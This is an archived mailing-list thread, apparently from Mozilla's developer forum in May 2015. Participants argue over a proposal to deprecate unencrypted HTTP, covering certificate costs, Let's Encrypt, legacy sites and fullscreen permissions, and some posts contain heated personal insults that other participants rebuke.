On 2015-05-01 8:03 AM, Matthew Phillips wrote: > Of course you know this is not true. There have been many petabytes of > free speech floating around on the internet for the last 2 decades, > despite not having mandatory https. There are some philosophical discussions to be had here around "freedom from" and "freedom to", maybe. As one example, for a long time there weren't rules about what side of the road you drive on. It just wasn't necessary. Over time that changed, obviously, and the rules of the road we have now make driving much safer, and that safety facilitates more real freedom for everyone than having no rules would. The risks and realities of the modern web are very different than they were 20 years go, and it's reasonable - and should be expected, IMO - that the web's rules of the road should have to grow and adapt as well. For what it's worth, I think you're making a leap to "mandatory" here that is not supported by the proposal, but you do have a good point about the cost of participating in speech that's worth digging into, so here's a question: If you run an ASP.NET site straight out of VS, you get HTTP-only, and lots of developers do this. Same thing AFAIK with pretty much all the serve-what-I-have-up-now tools on Linux, python, node, whatever. Do we have a clear sense of the impact this has on developers, and how to address that? - mhoye
![]() |
0 |
![]() |
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote: > There's pretty broad agreement that HTTPS is the way forward for the web. There is no such agreement, and even if there was, that doesn't mean you ge= t to force people to agree. =20 > In order to encourage web developers to move from HTTP to HTTPS, I would > like to propose establishing a deprecation plan for HTTP without security= .. You're using the wrong word here, what you're proposing is a coercion schem= e. > Broadly speaking, this plan would entail limiting new features to secure > contexts, followed by gradually removing legacy features from insecure > contexts. Having an overall program for HTTP deprecation makes a clear > statement to the web community that the time for plaintext is over -- it > tells the world that the new web uses HTTPS, so if you want to use new > things, you need to provide security. Martin Thomson and I drafted a > one-page outline of the plan with a few more considerations here: No, it just tells the world that you're a paid shill for the SSL cert racke= t. This idea of yours is bad. it's bad for the reasons very articulately outli= ned in this blog entry: http://cryto.net/~joepie91/blog/2015/05/01/on-mozil= las-forced-ssl/ the TL;DR of it is this: - TLS is broken because of the CA structure, which allows any CA to sign a = certificate for any website. - SSL certificates are a racket, I think this shouldn't require explanation= really. - "Free" SSL certificate providers don't exist (startcom is also a racket) - "Let's encrypt it" doesn't solve the variety of usecases (and it's setup = scheme is also batshit insane) I would personally like to add a few more to the list: - The freedom of speech should not require you to buy into an expensive rac= ket - SSL still has a non zero speed impact, which is a problem in some scenari= os. - Edge-routing/CDN etc. is a very useful technique that's currently practic= ally free to do, and allows scrummy startups to build awesome services. TLS= virtually kills all of that. - Not everything is even encryptable, really not. For instance UDP packets = carrying game-player positions aren't, because they arrive out of order. - There's an enormous amount of legacy content on the web you will *never* = get to move to TLS, you want to throw that all away too? - Implementing and using small, dedicated, quirky HTTP servers for the vari= ety of usecases there are is a very productive activity. Mandating/coercing= TLS makes all those existing deployments impossible, and it also makes it = impossible in the first place to have them at all. In summary, you're batshit insane, power hungry, and mad, and you're using = double speek at its finest.
![]() |
0 |
![]() |
On 5/1/15 02:54, 王小康 wrote: > P.S.:And finally, accept Cacert or a easy to use CA. CAs can only be included at their own request. As it stands, CACert has withdrawn its request to be included in Firefox until they have completed an audit with satisfactory results. If you want CACert to be included, contact them and ask what you can do to help. In the meanwhile, as has been brought up many times in this thread already, there are already deployed or soon-to-be-deployed "easy to use CAs" in the world. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
![]() |
0 |
![]() |
On 5/1/15 05:03, Matthew Phillips wrote: > All mandatory https will do is discourage people from participating in > speech unless they can afford the very high costs (both in dollars and > in time) that you are now suggesting be required. Let's be clear about the costs and effort involved. There are already several deployed CAs that issue certs for free. And within a couple of months, it will take users two simple commands, zero fiscal cost, and several tens of seconds to obtain and activate a cert: https://letsencrypt.org/howitworks/ There is great opportunity for you to update your knowledge about how the the world of CAs has changed in the past decade. Seize it. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
![]() |
0 |
![]() |
On Friday, May 1, 2015 at 7:03:32 PM UTC+2, Adam Roach wrote: > On 5/1/15 05:03, Matthew Phillips wrote: > > All mandatory https will do is discourage people from participating in > > speech unless they can afford the very high costs (both in dollars and > > in time) that you are now suggesting be required. >=20 > Let's be clear about the costs and effort involved. >=20 > There are already several deployed CAs that issue certs for free. And=20 > within a couple of months, it will take users two simple commands, zero= =20 > fiscal cost, and several tens of seconds to obtain and activate a cert: >=20 > https://letsencrypt.org/howitworks/ >=20 > There is great opportunity for you to update your knowledge about how=20 > the the world of CAs has changed in the past decade. Seize it. That's not how it works. That's how you and letsencrypt imagine it'll work.= In reality, it's anybodies guess if that's even feasible (I don't think so= , but I digress). Let's even assume that every shared host, CDN, etc. can use this (which the= y can't, because custom deployments, whatever), do you think the long-estab= lished SSL cert racket syndicate is going to take this lying down? Ok, so l= et's assume all the other pricey CAs are ok with this, magically, and aren'= t gonna torpedo truly free CAs with any lobbying dollar they can muster. Wh= at happens in the glorious future where the letsencrypt CA has attracted sa= y, 90% of all certs (because, duh, free), and then they get PWNed? Ooops.
![]() |
0 |
![]() |
You must have missed my original email: >I understand that there are proposed solutions to these problems but >they don't exist today and won't be ubiquitous for a while. Let's let these solutions prove themselves out first. There are no free wildcard cert vendors and, at least in my experience, what you do get is a heavy upsell and/or slow delivery of certificates. If this is your standard for good-enough I'm really fearful for the future of the web. It's paramount that the web remain a frictionless place where creating a website is dead simple. This is infinitely more important than making people feel safe knowing that http doesn't exist any more. My fear is that the pendulum has swung away from this (previously self-evident) position and the people running the web today have other priorities. On Fri, May 1, 2015, at 01:03 PM, Adam Roach wrote: > On 5/1/15 05:03, Matthew Phillips wrote: >> All mandatory https will do is discourage people from >> participating in speech unless they can afford the very high costs (both in dollars and in time) that you are now suggesting be required. > > Let's be clear about the costs and effort involved. > > There are already several deployed CAs that issue certs for free. And within a couple of months, it will take users two simple commands, zero fiscal cost, and several tens of seconds to obtain and activate a cert: > > https://letsencrypt.org/howitworks/ > > There is great opportunity for you to update your knowledge about how the the world of CAs has changed in the past decade. Seize it. > > -- > Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 > 0800 x863
![]() |
0 |
![]() |
Why encrypt (and slow down) EVERYTHING, when most web content isn't worth encrypting? I just don't see the point. This is the dumbest thing I've heard in a long while.
![]() |
0 |
![]() |
On Fri, May 1, 2015 at 2:07 PM, <scoughlin@cpeip.fsu.edu> wrote: > Why encrypt (and slow down) EVERYTHING I think this is largely outdated thinking. You can do TLS fast, and with low overhead. Even on the biggest and most latency sensitive sites in the world. https://istlsfastyet.com > when most web content isn't worth encrypting? Fundamentally HTTPS protects the transport of the content - not the secrecy of the content itself. It is afterall likely stored in cleartext on each computer. This is an important distinction no matter the nature of the content because Firefox, as the User's Agent, has a strong interest in the user seeing the content she asked for and protecting her confidentiality (as best as is possible) while doing the asking.Those are properties transport security gives you. Sadly, both of those fundamental properties of transport are routinely broken to the user's detriment, when http:// is used. As Martin and Richard have noted, we have a strong approach with HSTS for the migration of legacy markup onto https as long as the server is appropriately provisioned - and doing that is much more feasible now than it used to be. So sites that are deploying new features can make the transition with a minimum of fuss. For truly untouched and embedded legacy services I agree this is a harder problem and compatibility needs to be considered a managed risk. -P
![]() |
0 |
![]() |
Honestly, this is a terrible idea. The whole point of a browser is providin= g user access - this would take power away from users by deciding for them = what is permissible. It also fails to account for the bulk of web traffic w= hich does not require encryption (and is the reason HTTP exists in the firs= t place). Traditionally developers have been the ones to decide what traffic merits e= ncryption and what does not. An argument could be made that the decision sh= ould not rest solely with them, but also with users (who are stakeholders);= however, browsers certainly should not be involved in deciding whether a s= ite is accessed. If there are security concerns, then inform the user but do not make a blan= ket decision that would make unencrypted cat pictures inaccessible.
![]() |
0 |
![]() |
On Fri, May 1, 2015 at 2:37 PM, Patrick McManus <pmcmanus@mozilla.com> wrote: > It is afterall likely stored in cleartext on each computer. This is an > important distinction no matter the nature of the content because Firefox, > as the User's Agent, has a strong interest in the user seeing the content > she asked for and protecting her confidentiality (as best as is possible) > while doing the asking.Those are properties transport security gives you. > Sadly, both of those fundamental properties of transport are routinely > broken to the user's detriment, when http:// is used. Yes, I'll add something Patrick knows very well, but just to hammer it home: HTTPS as transport protection isn't just about confidentiality but integrity of the transport. So, even if those of you out there are saying "The web doesn't have much private stuff! jeez!" the web sure has a lot of stuff that is highly dynamic with javascript and other active content. That stuff needs be protected in transit lest the Great Cannon or any number of user-hostile crap on the net start owning your UAs, even if you don't think the content need be private. best, Joe -- Joseph Lorenzo Hall Chief Technologist Center for Democracy & Technology 1634 I ST NW STE 1100 Washington DC 20006-4011 (p) 202-407-8825 (f) 202-637-0968 joe@cdt.org PGP: https://josephhall.org/gpg-key fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
![]() |
0 |
![]() |
When plans like this aren't rolled out across all browsers together, users = inevitably come across a broken site and say "Firefox works with this site,= but Safari gives a warning. Safari must be broken". Better security is p= unished. Having this determined by a browser release is also bad. "My up to date F= irefox is broken, but my old Safari works. Updating breaks things and must= be bad!". Secure practices are punished. All browsers could change their behaviour on a specific date and time. Bu= t that would lead to stampedes of webmasters having issues all at once. An= d if theres any unforeseen compatibility issue, you just broke the entire w= orld. Not so great. So might I suggest the best rollout plan is to apply policies based on a ha= sh of the origin and a timestamp. Ie. on a specific date, 1% of sites hav= e the new policies enforced, while 99% do not. Then a month later, it's up= to 51%, and another month later it's up to 100%. Web masters can now see the date and time policies will be enforced for the= ir site, and there is no risk of breaking the entire internet on the same d= ay. Developer builds could apply the policies a few weeks early to give a heads= up.
![]() |
0 |
![]() |
On Sat, May 2, 2015 at 2:20 AM, <pyalot@gmail.com> wrote: > > In summary, you're batshit insane, power hungry, and mad, and you're using double speek at its finest. Please refrain from further discussion until you can avoid making crude personal attacks such as these. Nick
![]() |
0 |
![]() |
On Sat, May 2, 2015 at 11:57 AM, Nicholas Nethercote <n.nethercote@gmail.com > wrote: > Please refrain from further discussion until you can avoid making > crude personal attacks such as these. > I now mandate that you (and everyone you know) shall only do ethernet trough pigeon carriers. There are great advantages to doing this, and I can recommend a number of first rate pigeon breeders which will sell you pigeons bred for that purpose. I will not discuss with you any notion that pigeons shit onto everything and that cost might rise because pigeons are more expensive to keep than a copper line. Obviously you're a pigeon refusenik and preventer of great progress. My mandate for pigeons is binding will come into effect because I happen to have a controlling stake in all utility companies and come mid 2015 copper lines will be successively cut. Please refrain from disagreeing my mandate in vulgar terms, also I refuse any notion that using pigeons for ethernet by mandate is batshit insane (the'yre pigeons, not bats, please).
![]() |
0 |
![]() |
You should never force HTTPS. The win's are rather subjective and hard to confirm. But using HTTPS give problems for regular webmaster. Website will be slower on average. Webmaster need better hardware or pay mo= re to his hosting provider. HTTPS support is not always possible. For example some CDN's can't support = HTTPS in some specific modes. Third-party resources linked in HTML can miss HTTPS support and it will cau= se website work incorrectly in HTTPS. And you need to monitor this forever.= ... for all links on website! This point is valid for a huge % of websites. By enabling HTTPS-only you can easily lose 20% of visitors. Not all browser= s support your certificate. HTTPS libraries vulnerability can lead to website's origin server hack. The= problem here, is that libraries are just like code executed directly on se= rver. If there are vulnerability, you can not only decrypt the traffic, but= also execute code on the server. Certificates are just bunches with problems.. revocation, revalidation, lib= raries deprecation. And it worth mentioning, that certificate system makes = web centralized. When someone visit your HTTPS website it basically query s= ome other central server. If someone will have this server, he can get info= rmation about all your visitors. And that's shocky, i think. I am not against of encryption, but do not FORCE. HTTP is not LEGACY, it's = HTTP, the protocol which should be here forever. It's good, fast, and well = enough. That's really tricky question does HTTPS securer than HTTP. Encrypt= ion helps sometimes to prevent injections, but it's rather easy to bypass t= hat. Can NSA decrypt your HTTPS? Most probably yes. Can webmater of website= spy on you in HTTPS? Yes and it's even easier with HTTPS and HSTS because = of HSTS super cookie. Does HTTPS protect your password? Well, there are a c= hance, but if you think that HTTPS is a magic cure, you are complete idiot. My vote would be never use your browser if you will deprecate HTTP. That's = very easy to find an alternative or to fork you code, so think yourself how= much such decision can cost you. This phrase i want also to said to Chrome= dev team. Internet is live on developers. If you will start to do shit thi= ngs, you will be replaced.
![]() |
0 |
![]() |
On Sun, May 3, 2015 at 1:51 PM, <mofforg@gmail.com> wrote: > My vote would be never use your browser if you will deprecate HTTP. That's > very easy to find an alternative or to fork you code, so think yourself how > much such decision can cost you. This phrase i want also to said to Chrome > dev team. Internet is live on developers. If you will start to do shit > things, you will be replaced. > This has been happening in the Internet in China. I would suggest you use "360 Secure Browser", one of the major browsers in China. They completely consider the experience of developers and users. Their browser allows user to access a website even if the website provides a broken certificate :) - Xidorn
![]() |
0 |
![]() |
=D0=B2=D0=BE=D1=81=D0=BA=D1=80=D0=B5=D1=81=D0=B5=D0=BD=D1=8C=D0=B5, 3 =D0= =BC=D0=B0=D1=8F 2015 =D0=B3., 5:39:55 UTC+3 =D0=BF=D0=BE=D0=BB=D1=8C=D0=B7= =D0=BE=D0=B2=D0=B0=D1=82=D0=B5=D0=BB=D1=8C Xidorn Quan =D0=BD=D0=B0=D0=BF= =D0=B8=D1=81=D0=B0=D0=BB: > This has been happening in the Internet in China. I would suggest you use > "360 Secure Browser", one of the major browsers in China. They completely > consider the experience of developers and users. Their browser allows use= r > to access a website even if the website provides a broken certificate :) >=20 > - Xidorn In usual situation, "allows user to access a website even if the website pr= oviders a broken certificate" is OK. The truth is, that usually that happen= s by mistake of webmaster, not when someone tries to hack you. However what= Chrome & Firefox do is better i think, give user a choice. Basically, to shorte my message - If Mozilla will deprecate HTTP, we will d= eprecate Mozilla.
![]() |
0 |
![]() |
On Sun, May 3, 2015 at 2:46 PM, <mofforg@gmail.com> wrote: > =D0=B2=D0=BE=D1=81=D0=BA=D1=80=D0=B5=D1=81=D0=B5=D0=BD=D1=8C=D0=B5, 3 =D0= =BC=D0=B0=D1=8F 2015 =D0=B3., 5:39:55 UTC+3 =D0=BF=D0=BE=D0=BB=D1=8C=D0=B7= =D0=BE=D0=B2=D0=B0=D1=82=D0=B5=D0=BB=D1=8C Xidorn Quan =D0=BD=D0=B0=D0=BF= =D0=B8=D1=81=D0=B0=D0=BB: > > This has been happening in the Internet in China. I would suggest you u= se > > "360 Secure Browser", one of the major browsers in China. They complete= ly > > consider the experience of developers and users. Their browser allows > user > > to access a website even if the website provides a broken certificate := ) > > In usual situation, "allows user to access a website even if the website > providers a broken certificate" is OK. The truth is, that usually that > happens by mistake of webmaster, not when someone tries to hack you. > However what Chrome & Firefox do is better i think, give user a choice. > > Basically, to shorte my message - If Mozilla will deprecate HTTP, we will > deprecate Mozilla. > I don't think anyone will ever completely drop support of HTTP. What we probably will do, at very most, is to treat HTTP websites just like the websites provide a broken certificate. - Xidorn
![]() |
0 |
![]() |
=D0=B2=D0=BE=D1=81=D0=BA=D1=80=D0=B5=D1=81=D0=B5=D0=BD=D1=8C=D0=B5, 3 =D0= =BC=D0=B0=D1=8F 2015 =D0=B3., 6:06:08 UTC+3 =D0=BF=D0=BE=D0=BB=D1=8C=D0=B7= =D0=BE=D0=B2=D0=B0=D1=82=D0=B5=D0=BB=D1=8C Xidorn Quan =D0=BD=D0=B0=D0=BF= =D0=B8=D1=81=D0=B0=D0=BB: > I don't think anyone will ever completely drop support of HTTP. What we > probably will do, at very most, is to treat HTTP websites just like the > websites provide a broken certificate. >=20 > - Xidorn It's the same as drop because regular people will aware, then know the diff= erence https/http and switch to https by force just to not see ****ing warn= ing. HTTP was not made to be encrypted and showing warnings in it is stipid.
![]() |
0 |
![]() |
On 01/05/15 19:02, Matthew Phillips wrote: > You must have missed my original email: > It's paramount that the web remain a frictionless place where creating a > website is dead simple. That is not true today of people who want to run their own hosting. So people who want "frictionless" use blogspot.com, or one of the thousands of equivalent sites in many different jurisdictions, to say what they want to say. In an HTTPS future, such sites would simply provide HTTPS for their users. Gerv
![]() |
0 |
![]() |
On 01/05/15 19:02, Matthew Phillips wrote: > You must have missed my original email: > It's paramount that the web remain a frictionless place where creating a > website is dead simple. That is not true today of people who want to run their own hosting. So people who want "frictionless" use blogspot.com, or one of the thousands of equivalent sites in many different jurisdictions, to say what they want to say. In an HTTPS future, such sites would simply provide HTTPS for their users. Gerv
![]() |
0 |
![]() |
On 03/05/15 03:39, Xidorn Quan wrote: > This has been happening in the Internet in China. I would suggest you use > "360 Secure Browser", one of the major browsers in China. They completely > consider the experience of developers and users. Their browser allows user > to access a website even if the website provides a broken certificate :) Translation: their browser makes MITM attacks much easier. Gerv
![]() |
0 |
![]() |
On Mon, May 4, 2015 at 10:04 PM, Gervase Markham <gerv@mozilla.org> wrote: > On 03/05/15 03:39, Xidorn Quan wrote: > > This has been happening in the Internet in China. I would suggest you u= se > > "360 Secure Browser", one of the major browsers in China. They complete= ly > > consider the experience of developers and users. Their browser allows > user > > to access a website even if the website provides a broken certificate := ) > > Translation: their browser makes MITM attacks much easier. > I think Xidorn was being sarcastic :-) Rob --=20 oIo otoeololo oyooouo otohoaoto oaonoyooonoeo owohooo oioso oaonogoroyo owoiotoho oao oboroootohoeoro oooro osoiosotoeoro owoiololo oboeo osouobojoeocoto otooo ojouodogomoeonoto.o oAogoaoiono,o oaonoyooonoeo owohooo osoaoyoso otooo oao oboroootohoeoro oooro osoiosotoeoro,o o=E2=80=98oRoaoco= ao,o=E2=80=99o oioso oaonosowoeoroaoboloeo otooo otohoeo ocooouoroto.o oAonodo oaonoyooonoeo owohooo osoaoyoso,o o=E2=80=98oYooouo ofooooolo!o=E2=80=99o owoiololo oboeo oiono o= doaonogoeoro ooofo otohoeo ofoioroeo ooofo ohoeololo.
![]() |
0 |
![]() |
On 5/2/15 05:25, Florian Bösch wrote: > I now mandate that you (and everyone you know) shall only do ethernet > trough pigeon carriers. There are great advantages to doing this, and > I can recommend a number of first rate pigeon breeders which will sell > you pigeons bred for that purpose. I will not discuss with you any > notion that pigeons shit onto everything and that cost might rise > because pigeons are more expensive to keep than a copper line. > Obviously you're a pigeon refusenik and preventer of great progress. > My mandate for pigeons is binding will come into effect because I > happen to have a controlling stake in all utility companies and come > mid 2015 copper lines will be successively cut. Please refrain from > disagreeing my mandate in vulgar terms, also I refuse any notion that > using pigeons for ethernet by mandate is batshit insane (the'yre > pigeons, not bats, please). It's clear you didn't see it as such, but Nicholas was trying to do you a favor. You obviously have input you'd like to provide on the topic, and the very purpose of this thread is to gather input. If you show up with well-reasoned arguments in a tone that assumes good faith, there's a real chance for a conversation here where people reach a common understanding and potentially change certain aspects of the outcome. If all you're willing to do is hurl vitriol from the sidelines, you're not making a difference. Even if you have legitimate and well-thought-out points hidden in the venom, no one is going to hear them. Nicholas, like I, would clearly prefer that the time of people on this mailing list be spent conversing with others who want to work for a better future rather than those who simply want to be creatively abusive. You get to choose which one you are. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
![]() |
0 |
![]() |
On Monday, May 4, 2015 at 9:40:08 AM UTC-4, Adam Roach wrote: > On 5/2/15 05:25, Florian B=F6sch wrote: > > I now mandate that you (and everyone you know) shall only do ethernet= =20 > > trough pigeon carriers. There are great advantages to doing this, and= =20 > > I can recommend a number of first rate pigeon breeders which will sell= =20 > > you pigeons bred for that purpose. I will not discuss with you any=20 > > notion that pigeons shit onto everything and that cost might rise=20 > > because pigeons are more expensive to keep than a copper line.=20 > > Obviously you're a pigeon refusenik and preventer of great progress.=20 > > My mandate for pigeons is binding will come into effect because I=20 > > happen to have a controlling stake in all utility companies and come=20 > > mid 2015 copper lines will be successively cut. Please refrain from=20 > > disagreeing my mandate in vulgar terms, also I refuse any notion that= =20 > > using pigeons for ethernet by mandate is batshit insane (the'yre=20 > > pigeons, not bats, please). >=20 > It's clear you didn't see it as such, but Nicholas was trying to do you= =20 > a favor. >=20 > You obviously have input you'd like to provide on the topic, and the=20 > very purpose of this thread is to gather input. If you show up with=20 > well-reasoned arguments in a tone that assumes good faith, there's a=20 > real chance for a conversation here where people reach a common=20 > understanding and potentially change certain aspects of the outcome. >=20 > If all you're willing to do is hurl vitriol from the sidelines, you're=20 > not making a difference. Even if you have legitimate and=20 > well-thought-out points hidden in the venom, no one is going to hear=20 > them. Nicholas, like I, would clearly prefer that the time of people on= =20 > this mailing list be spent conversing with others who want to work for a= =20 > better future rather than those who simply want to be creatively=20 > abusive. You get to choose which one you are. >=20 > --=20 > Adam Roach > Principal Platform Engineer > abr@mozilla.com > +1 650 903 0800 x863 "Nothing goes over my head! My reflexes are too fast, I would catch it." -- Drax the Destroyer
![]() |
0 |
![]() |
I agree HTTPS makes information safer and protects it=B9s integrity, making it (once again) safer. However; 1) are the benefits worth the millions of man-hours, and countless dollars this will cost? 2) why is Mozilla suddenly everyone=B9s nanny? - Shawn On 5/1/15, 2:44 PM, "Joseph Lorenzo Hall" <joe@cdt.org> wrote: >On Fri, May 1, 2015 at 2:37 PM, Patrick McManus <pmcmanus@mozilla.com> >wrote: >> It is afterall likely stored in cleartext on each computer. This is an >> important distinction no matter the nature of the content because >>Firefox, >> as the User's Agent, has a strong interest in the user seeing the >>content >> she asked for and protecting her confidentiality (as best as is >>possible) >> while doing the asking.Those are properties transport security gives >>you. >> Sadly, both of those fundamental properties of transport are routinely >> broken to the user's detriment, when http:// is used. > >Yes, I'll add something Patrick knows very well, but just to hammer it >home: HTTPS as transport protection isn't just about confidentiality >but integrity of the transport. > >So, even if those of you out there are saying "The web doesn't have >much private stuff! jeez!" the web sure has a lot of stuff that is >highly dynamic with javascript and other active content. That stuff >needs be protected in transit lest the Great Cannon or any number of >user-hostile crap on the net start owning your UAs, even if you don't >think the content need be private. > >best, Joe > >--=20 >Joseph Lorenzo Hall >Chief Technologist >Center for Democracy & Technology >1634 I ST NW STE 1100 >Washington DC 20006-4011 >(p) 202-407-8825 >(f) 202-637-0968 >joe@cdt.org >PGP: https://josephhall.org/gpg-key >fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
![]() |
0 |
![]() |
On Mon, May 4, 2015 at 3:38 PM, Adam Roach <abr@mozilla.com> wrote: > others who want to work for a better future > A client of mine whom I polled if they can move to HTTPs with their server stated they do not have the time and resources to do so. So the fullscreen button will just stop working. That's an amazing better future right there. You didn't get what you want (HTTPS), I didn't get what I want (a cool feature working) and the client didn't get what he wanted (a feature working they paid money to integrate). Loose/Loose/Loose situations are pretty much the best kind of better future I can think of. Congrats.
![]() |
0 |
![]() |
On 5/4/15 11:24, Florian Bösch wrote: > On Mon, May 4, 2015 at 3:38 PM, Adam Roach <abr@mozilla.com > <mailto:abr@mozilla.com>> wrote: > > others who want to work for a better future > > A client of mine whom I polled if they can move to HTTPs with their > server stated they do not have the time and resources to do so. So the > fullscreen button will just stop working. That's an amazing better > future right there. You have made some well-thought-out contributions to conversations at Mozilla in the past. I'm a little sad that you're choosing not to participate in a useful way here. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
![]() |
0 |
![]() |
On Mon, May 4, 2015 at 6:33 PM, Adam Roach <abr@mozilla.com> wrote: > You have made some well-thought-out contributions to conversations at > Mozilla in the past. I'm a little sad that you're choosing not to > participate in a useful way here. > I think this is a pretty relevant contribution. Obviously it's not the kind of story you want to hear. It's also not the story I want to hear. But we can't pick and choose what we will get. And that's what you'll get: I have polled a client of mine which has a small web property that contains a WebGL widget which does include a fullscreen button. Here is what I wrote that client: I'd like to inform you that it's likely that the fullscreen button will > break in google chrome and firefox in the forseeable future (mid > 2015-2016). For security reasons browsers want to disable fullscreen if you > are not serving the website over HTTPS. > Starting mid 2015 a new SSL Certificate Authority will offer free > certificates (https://letsencrypt.org/) > Do you think you could host your site over HTTPS to prevent the fullscreen > button breaking? If required, I could also remove the fullscreen button. The clients response below: I appreciate the heads up. > Redesigning our site to use HTTPS is probably possible but I currently do > not have time and resources to undertake that task. > Would it be possible to let me know when you get the information that the > first production Chrome or Firefox is released? At that time I can > certainly disable the fullscreen function myself as this is real easy to do > in your .js file. So yeah, again, Congrats.
![]() |
0 |
![]() |
On Mon, May 4, 2015 at 9:39 AM, Florian B=C3=B6sch <pyalot@gmail.com> wrote= : > On Mon, May 4, 2015 at 6:33 PM, Adam Roach <abr@mozilla.com> wrote: > > > You have made some well-thought-out contributions to conversations at > > Mozilla in the past. I'm a little sad that you're choosing not to > > participate in a useful way here. > > > > I think this is a pretty relevant contribution. Obviously it's not the ki= nd > of story you want to hear. It's also not the story I want to hear. But we > can't pick and choose what we will get. And that's what you'll get: > > I have polled a client of mine which has a small web property that contai= ns > a WebGL widget which does include a fullscreen button. > > Here is what I wrote that client: > > I'd like to inform you that it's likely that the fullscreen button will > > break in google chrome and firefox in the forseeable future (mid > > 2015-2016). For security reasons browsers want to disable fullscreen if > you > > are not serving the website over HTTPS. > > Starting mid 2015 a new SSL Certificate Authority will offer free > > certificates (https://letsencrypt.org/) > > Do you think you could host your site over HTTPS to prevent the > fullscreen > > button breaking? If required, I could also remove the fullscreen button= .. > > > The clients response below: > > I appreciate the heads up. > > Redesigning our site to use HTTPS is probably possible but I currently = do > > not have time and resources to undertake that task. > > Would it be possible to let me know when you get the information that t= he > > first production Chrome or Firefox is released? At that time I can > > certainly disable the fullscreen function myself as this is real easy t= o > do > > in your .js file. > > > So yeah, again, Congrats. This would be more useful if you explained what they considered the cost of converting to HTTPS so, so we could discuss ways to ameliorate that cost. With that said, fullscreen is actually a good example of a feature which really benefits from being over HTTPS. Consider what happens if the user grants a persistent permission to site X to use fullscreen. At that point, any network attacker can take over the user's entire screen without their consent by pretending to be site X. Note that this is true *even if* the real version of site X doesn't do anything sensitive. So, I think it should be fairly easy to understand why we want to limit access to fullscreen over HTTP. -Ekr
![]() |
0 |
![]() |
On 05/04/2015 09:39 AM, Florian B�sch wrote: > Here is what I wrote that client: > > [...] For security reasons browsers want to disable fullscreen if you >> are not serving the website over HTTPS. Are you sure this is true? Where has it been proposed to completely disable fullscreen for non-HTTPS connections? (I think there's a strong case for disabling *persistent* fullscreen permission, for the reasons described in ekr's response to you here. I haven't seen any proposal for going beyond that, but I might've missed it.) ~Daniel
![]() |
0 |
![]() |
On Mon, May 4, 2015 at 11:00 AM, Daniel Holbert <dholbert@mozilla.com> wrote: > (I think there's a strong case for disabling *persistent* fullscreen > permission, for the reasons described in ekr's response to you here. I > haven't seen any proposal for going beyond that, but I might've missed it.) A little birdy told me that that is planned.
![]() |
0 |
![]() |
On Mon, May 4, 2015 at 10:52 AM, Florian B=C3=B6sch <pyalot@gmail.com> wrot= e: > On Mon, May 4, 2015 at 7:43 PM, Eric Rescorla <ekr@rtfm.com> wrote: > >> This would be more useful if you explained what they considered the cost >> of converting to HTTPS so, so we could discuss ways to ameliorate that c= ost. >> > I agree. But I don't get to choose what answers I get. I can press the > point out of interest. But even if I get to some satisfactory outcome the= re > that way, it's still effort/money to expend, there's dozens of clients fr= om > the past and more in the future that I'll have to have the same conversio= n > with. For the ones from the past, in many cases even in an ideal case (no= t > much effort and everybody knows what's to do), the budget for those > deployments is used up. There's no new budget coming. They're not going t= o > get fixed no matter the good intentions of everybody. End of the day, wor= k > is not free. > I'm going to refer you at this point to the W3C HTML design principles of priority of constituencies (http://www.w3.org/TR/html-design-principles/#priority-of-constituencies). "In case of conflict, consider users over authors over implementors over specifiers over theoretical purity. In other words costs or difficulties to the user should be given more weight than costs to authors; which in turn should be given more weight than costs to implementors; which should be given more weight than costs to authors of the spec itself, which should be given more weight than those proposing changes for theoretical reasons alone. Of course, it is preferred to make things better for multiple constituencies at once." Again, we're happy to look at ways to ease this transition, but right now you're not offering any. With that said, fullscreen is actually a good example of a feature which >> really benefits from being over HTTPS. Consider what happens if the user >> grants a persistent permission to site X to use fullscreen. At that poin= t, >> any network attacker can take over the user's entire screen without thei= r >> consent by pretending to be site X. Note that this is true *even if* the >> real version of site X doesn't do anything sensitive. So, I think it sho= uld >> be fairly easy to understand why we want to limit access to fullscreen o= ver >> HTTP. >> > > I don't agree with that reasoning. But my agreeing to it or not doesn't > change the outcome I have tested in the real world. > I don't really understand what you're talking about here. I think this is a fairly straightforward security analysis here. I appreciate that it makes people sad that we don't want to let them do unsafe things, but that doesn't make them safe. If you have a security analysis to offer in this case about why fullscreen over HTTP is safe, I'd be happy to hear it. -Ekr
![]() |
0 |
![]() |
On Mon, May 4, 2015 at 8:06 PM, Eric Rescorla <ekr@rtfm.com> wrote: > > I'm going to refer you at this point to the W3C HTML design principles of > priority of constituencies > (http://www.w3.org/TR/html-design-principles/#priority-of-constituencies). > > "In case of conflict, consider users over authors over implementors over > specifiers over theoretical purity. In other words costs or difficulties to > the user should be given more weight than costs to authors; which in turn > should be given more weight than costs to implementors; which should be > given more weight than costs to authors of the spec itself, which should be > given more weight than those proposing changes for theoretical reasons > alone. Of course, it is preferred to make things better for multiple > constituencies at once." > > Again, we're happy to look at ways to ease this transition, but right now > you're not offering any. > You've set out on a course that leaves no room to offer any. You're going to break things. You've decided to break things and damn the consequences. You've decided to synchronize breaking things so that users have no UA to flee to. And you've decided to hide your breaking of things so that the shitstorm isn't going to come all at once. You're trying to delegate the cost to fix things you broke for users, to authors, which in many cases cannot burden that cost, even if they wanted to. I, as an author, tell you that this isn't going to go over smoothly. In fact, it's going to go over pretty terribly badly. Coercing everybody to conform with your greater goal (tm) from a situation where many cannot comply always does.
![]() |
0 |
![]() |
